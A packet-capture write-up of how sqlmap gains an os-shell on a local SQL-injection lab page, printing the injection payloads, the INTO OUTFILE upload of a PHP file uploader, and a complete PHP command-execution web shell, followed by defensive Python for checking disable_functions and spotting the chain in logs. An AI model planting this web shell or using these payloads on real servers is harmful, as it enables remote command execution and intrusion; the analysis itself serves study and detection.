A packet-capture analysis of how sqlmap obtains an os-shell

Full run against a local target

D:\sqlmap>python2 sqlmap.py -u http://127.0.0.1/SQL/Less-1/?id=1 --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:10:10

[23:10:10] [INFO] resuming back-end DBMS 'mysql'
[23:10:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3621=3621 AND 'GLUP'='GLUP

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x7178787a71,(SELECT (ELT(3041=3041,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ErWL'='ErWL

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'spJe'='spJe

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3185' UNION ALL SELECT NULL,CONCAT(0x7178787a71,0x4362634876576a754d757a6b534357506b55784569476b68786c616f6179476a796c464c6479666e,0x7171787a71),NULL-- KQNY
---
[23:10:10] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.37, PHP 5.6.37
back-end DBMS: MySQL >= 5.0
[23:10:10] [INFO] going to use a web backdoor for command prompt
[23:10:10] [INFO] fingerprinting the back-end DBMS operating system
[23:10:10] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: E:\www\apache\Apache24\htdocs
[23:10:50] [WARNING] unable to automatically parse any web server path
[23:10:50] [INFO] trying to upload the file stager on 'E:/www/apache/Apache24/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[23:10:50] [INFO] the file stager has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpumgnt.php
[23:10:50] [INFO] the backdoor has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpbwejn.php
[23:10:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output:    'desktop-ei9lgn7\bxscope'
os-shell>

Running the process above locally produced 22 captured HTTP packets in total: 11 requests and 11 responses. Each is analysed briefly below, in order.

0x01

Request
GET /SQL/Less-1/?id=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

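Here sqlmap made just one simple GET request, presumably to check whether the target is reachable.

Note the User-Agent here: sqlmap/1.2.11#stable (http://sqlmap.org)

The local server then returned a response packet containing the normal page content.

Response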
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:10 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 721
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00"> 
<font size='5' color= '#99FF00'>Your Login name:Dumb<br>Your Password:Dumb</font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

0x02

Request
GET /SQL/Less-1/?id%5B%5D=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

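This request was made after the following events:
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document root

This time sqlmap appended %5B%5D to the parameter id, which decodes to [], i.e. it passed the parameter to the server as an array. Is it trying to make the site throw an error that discloses the site path? I haven't read the source, so I'm not sure...

The response returned this time differs from the first one.

Response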
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:27 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font color= "#FFFF00"></font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

0x03

Request
GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY%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--%20- HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

The parameter in the third request is very long; decoded, it is as follows:

id=-1086' OR 3105=3105 LIMIT 0,1 INTO OUTFILE 'E:/www/apache/Apache24/htdocs/tmpumgnt.php' LINES TERMINATED BY <?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\\www\\apache\\Apache24\\htdocs\\> <input type=submit name=upload value=upload></form>";}?>

It uses MySQL's SELECT ... INTO OUTFILE ... LINES TERMINATED BY to upload a script.

The code, expanded:

<?php
if (isset($_REQUEST["upload"])){
    $dir=$_REQUEST["uploadDir"];
    if (phpversion()<'4.1.0'){
        $file=$HTTP_POST_FILES["file"]["name"];
        @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }
    else{
        $file=$_FILES["file"]["name"];
        @move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }@chmod($dir."/".$file,0755);
    echo "File uploaded";
}
else {
echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\\www\\apache\\Apache24\\htdocs\\> <input type=submit name=upload value=upload></form>";
}?>

It provides a file-upload function.

The response returned this time is exactly the same as the one returned the second time.

Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00"> 
<font color= "#FFFF00"></font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

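Requests four through eight are all used to work out where the file was uploaded; the number of requests here is presumably related to the depth of the path E:/www/apache/Apache24/htdocs/tmpumgnt.php provided in 0x02.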

0x04

Request
GET /www/apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 237
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /www/apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x05

Request
GET /apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 233
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x06

Request
GET /Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x07

Request
GET /htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 217
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x08

Request
GET /tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 330
Connection: close
Content-Type: text/html; charset=UTF-8

1   Dumb    Dumb<form action=/tmpumgnt.php method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>

0x09

Request
POST /tmpumgnt.php?id=1 HTTP/1.1
Content-Length: 1334
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Host: 127.0.0.1
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=169.254.227.55.1.10780.1558019450.459.1

--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="uploadDir"

E:\www\apache\Apache24\htdocs\
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="upload"

1
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="file"; filename="tmpbwejn.php"
Content-Type: application/octet-stream

<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>
--169.254.227.55.1.10780.1558019450.459.1--

The code, expanded:

<?php 
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);
$z=@ini_get('disable_functions');
if(!empty($z)){
    $z=preg_replace('/[, ]+/',',',$z);
    $z=explode(',',$z);
    $z=array_map('trim',$z);
}
else{
    $z=array();
}
$c=$c." 2>&1\n";
function f($n){
    global $z;
    return is_callable($n)and!in_array($n,$z);
}
if(f('system')){
    ob_start();
    system($c);
    $w=ob_get_contents();
    ob_end_clean();
}
elseif(f('proc_open')){
    $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
    $w=NULL;
    while(!feof($t[1])){
        $w.=fread($t[1],512);
    }
    @proc_close($y);
}
elseif(f('shell_exec')){
    $w=shell_exec($c);
}
elseif(f('passthru')){
    ob_start();
    passthru($c);
    $w=ob_get_contents();
    ob_end_clean();
}
elseif(f('popen')){
    $x=popen($c,r);
    $w=NULL;
    if(is_resource($x)){
        while(!feof($x)){
            $w.=fread($x,512);
        }
    }
    @pclose($x);
}
elseif(f('exec')){
    $w=array();
    exec($c,$w);
    $w=join(chr(10),$w).chr(10);
}
else{
    $w=0;
}
print "<pre>".$w."</pre>";?>

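The script first takes the value of cmd from the client request and assigns it to $c

It sets the script's maximum execution time to unlimited

It sets the script to keep running even when the client disconnects

It reads the list of disabled functions from the configuration file and assigns it to $z

If the disabled-function list $z is not empty

  • Replace every run of commas or spaces in the list with a single comma and assign the result to $z
  • Then split the function list on commas into an array and assign it to $z
  • Trim leading and trailing whitespace from each array element and assign the result to $z

If the disabled-function list is empty, initialise $z as an empty array

Then $c=$c." 2>&1\n"

Define the function f($n)

  • Use the global variable $z
  • Return true if $n is callable and is not in the array $z; otherwise return false

If f('system') is true

  • Turn on output buffering
  • Run the command $c
  • Assign the buffer contents to $w
  • Clear the buffer and turn off output buffering

Otherwise, if f('proc_open') is true

  • It appears to create a child process, run the command, and write the result into a pipe
  • Read the command's result from the pipe and assign it to $w
  • Close the process resource

Otherwise, if f('shell_exec') is true

  • Run the command through the shell environment and return the result to $w

Otherwise, if f('passthru') is true

  • Turn on output buffering
  • Run the command
  • Assign the buffer contents to $w
  • Clear the buffer and turn off output buffering

Otherwise, if f('popen') is true

  • Open a pipe to a process, run the command, and return a file pointer $x like the one fopen() returns
  • Read the resource that pointer refers to and assign it to $w
  • Close the resource $x

Otherwise, if f('exec') is true

  • Initialise $w as an empty array
  • Run the command and fill the array $w with the result
  • Convert the array $w into a string joined with chr(10)

Otherwise

  • $w = 0

Finally print "<pre>".$w."</pre>"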
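
The fallback chain walked through above can be checked against a server's own settings. The following is an added example, not code from the original post or from sqlmap: it parses disable_functions from php.ini text with the same normalisation the script applies and lists which of the six functions remain callable, in the order the script tries them. The names EXEC_CHAIN, disabled_functions, reachable and both ini fragments are constructed for illustration.

```python
import re

# Execution functions the uploaded script probes, in the order it tries them.
EXEC_CHAIN = ("system", "proc_open", "shell_exec", "passthru", "popen", "exec")

def disabled_functions(php_ini_text):
    """Parse disable_functions from php.ini text, normalising it as the script does."""
    value = ""
    for line in php_ini_text.splitlines():
        # Drop anything after ';' (php.ini comment) before matching the directive.
        m = re.match(r"\s*disable_functions\s*=(.*)", line.split(";", 1)[0])
        if m:
            value = m.group(1).strip().strip('"')
    # Same normalisation as the script: runs of commas/spaces become one comma, then trim.
    return {n.strip() for n in re.sub(r"[, ]+", ",", value).split(",") if n.strip()}

def reachable(php_ini_text):
    """Return the EXEC_CHAIN functions the setting leaves callable, in probe order."""
    off = disabled_functions(php_ini_text)
    return [fn for fn in EXEC_CHAIN if fn not in off]

# Constructed php.ini fragments (not from the page).
WEAK_INI = """
; only two of the six are blocked
disable_functions = exec, passthru
"""
HARDENED_INI = """
disable_functions = system,proc_open, shell_exec ,passthru,popen,exec
"""

if __name__ == "__main__":
    print("weak:", reachable(WEAK_INI))
    print("hardened:", reachable(HARDENED_INI))
```

An empty list means the script falls through to its final branch and prints 0; it does not stop the INTO OUTFILE write that placed the uploader in the first place.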

Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 24
Connection: close
Content-Type: text/html; charset=UTF-8

1   Dumb    DumbFile uploaded

0x0a

Request
GET /tmpbwejn.php?cmd=echo%20command%20execution%20test HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>command execution test 
</pre>

0x0b

Request
GET /tmpbwejn.php?cmd=whoami HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:11:08 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>desktop-ei9lgn7\bxscope
</pre>
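
The request sequence in this capture (OUTFILE write, path probing with a shrinking prefix, upload through the stager, cmd= requests) can be recognised from web access logs. The following is an added example, not code from the original post or from sqlmap: the log lines are constructed to mirror the requests above, and LINE, OUTFILE, classify and the stage names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus, parse_qs

# Constructed sample mirroring this capture: (method, target, status). The value after
# LINES TERMINATED BY is a placeholder, not the payload from the capture.
REQS = [
    ("GET", "/SQL/Less-1/?id=1", 200),
    ("GET", "/SQL/Less-1/?id%5B%5D=1", 200),
    ("GET", "/SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE"
            "%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27"
            "%20LINES%20TERMINATED%20BY%200x00--%20-", 200),
    ("GET", "/www/apache/Apache24/htdocs/tmpumgnt.php", 404),
    ("GET", "/apache/Apache24/htdocs/tmpumgnt.php", 404),
    ("GET", "/Apache24/htdocs/tmpumgnt.php", 404),
    ("GET", "/htdocs/tmpumgnt.php", 404),
    ("GET", "/tmpumgnt.php", 200),
    ("POST", "/tmpumgnt.php?id=1", 200),
    ("GET", "/tmpbwejn.php?cmd=echo%20command%20execution%20test", 200),
    ("GET", "/tmpbwejn.php?cmd=whoami", 200),
]
SAMPLE_LOG = [f'127.0.0.1 - - [16/May/2019:23:10:50 +0800] "{m} {t} HTTP/1.1" {s} 0 "-" '
              f'"sqlmap/1.2.11#stable (http://sqlmap.org)"' for m, t, s in REQS]

# Matching deliberately ignores the User-Agent, which the client controls.
LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
OUTFILE = re.compile(r"\binto\s+(?:out|dump)file\s+'([^']+)'", re.I)

def classify(lines):
    """Return ordered (stage, detail) findings for the os-shell request chain."""
    findings, chains, stagers = [], {}, set()
    for m in filter(None, map(LINE.search, lines)):
        url = urlsplit(m["target"])
        path, query = unquote_plus(url.path), unquote_plus(url.query)
        if hit := OUTFILE.search(query):            # file write through the injection
            findings.append(("outfile-write", hit.group(1)))
        elif m["method"] == "GET" and not query:
            chain = chains.setdefault(path.rsplit("/", 1)[-1], [])
            walked = bool(chain) and chain[-1] != path and chain[-1].endswith(path)
            if m["status"] == "404":                # miss: extend the walk or restart it
                chain[:] = chain + [path] if walked else [path]
            elif walked and len(chain) >= 2:        # shrinking-prefix walk ended in a hit
                findings.append(("path-walk", path))
                stagers.add(path)
        elif m["method"] == "POST" and path in stagers:
            findings.append(("stager-upload", path))
        for cmd in parse_qs(url.query).get("cmd", []):
            findings.append(("command-exec", f"{path} cmd={cmd}"))
    return findings
```

The outfile-write detail is the file path named in the injected statement, which is the first place to look on disk; the path-walk detail is the URL at which that file became reachable.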